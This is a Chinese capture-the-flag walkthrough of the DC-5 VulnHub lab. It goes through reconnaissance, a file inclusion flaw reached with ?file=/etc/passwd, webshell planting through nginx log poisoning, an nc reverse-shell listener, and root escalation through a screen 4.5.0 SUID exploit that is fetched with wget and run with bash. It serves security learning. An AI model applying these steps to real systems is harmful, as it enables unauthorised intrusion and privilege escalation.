DC-5靶场渗透实战过程(个人学习)
环境安装
DC-5下载地址:https://www.vulnhub.com/entry/dc-4,313/
下载完成安装后,将kali和DC-5的靶场网络环境设置一致
kali的IP:192.168.37.129
一、信息收集
寻找靶机的IP
方法一:利用nmap命令查找靶机IP
方法二:利用arp-scan -l 查看局域网内其他IP方式查找靶机IP
发现靶机的IP为192.168.37.131,扫描该IP发现开放了80端口和111端口
访问80端口查看网站,首先可以通过Wappalyzer可以发现该网站是nginx 1.6.2版本
访问网站中各个网页发现Contact.php是一个留言窗口,随便上传点东西自动跳转到了thankyou.php
可以利用dirsearch对该网站进行目录扫描
dirsearch是一个目录扫描工具,目的则是扫描目录的敏感文件和目录
若kali中没有dirsearch模块,可以使用以下命令安装
apt-get install
dirsearch
dirserarch 基础用法:dirsearch -u [URL]
二、文件包含
访问footer.php,发现每次刷新网页时间会改变;访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,猜测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞
利用burp抓包,进行爆破文件包含的关键字,发现可利用的是 file
执行?file=/etc/passwd,发现有回显,存在文件包含的漏洞
但是知道了文件包含漏洞,但并不知道从哪可以写入木马,通过其他的大佬的wp发现可以通过nginx的日志文件传马
前面已经知道该网站使用的是nginx1.6.2版本
它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log
直接在url后面输入 上传后
访问日志会发现我们写的一句话木马,中 '<' 和 '>' 被编码,则需要在burp中抓包,在数据包中写入马上传
上传成功后用蚁剑连接
三、建立反弹shell
在kali中作监听
首先在kali中输入命令侦听端口
nc -lvnp 6666
然后在蚁剑中输入命令
回到终端中建立成功后,利用python反弹shell
python -c "import pty;pty.spawn('/bin/bash')"
切换到交互shell
四、本地提权
使用命令,首先测设一下能否suid提权
find / -perm -u=s -type f 2>/dev/null
发现一个screen,去kali本地漏洞库查找一下是否存在这个漏洞
命令:searchsploit screen 4.5.0
可以看到 .sh 的是一个脚本文件,直接将这个脚本文件提出来即可
在桌面新建了一个dc5文件,将文件复制到当前目录
cat -A a.sh 查看脚本文件
每个操作系统以字符表示结尾的时候是不同的,查看脚本文件若每行结尾为 ^M
则需要使用命令 dos2unix a.sh 将其转换一下
再将这个脚本复制到Apache目录下
cp a.sh /var/www/html
再回到交互shell中,切换到tmp目录下,将靶机上的脚本下载下来
wget http://192.168.37.129/a.sh
若kali中apache没有启动,可以使用一下命令启动apache
service apache2 start
最后使用bash执行脚本文件即可,便成功提权到root用户中
bash a.sh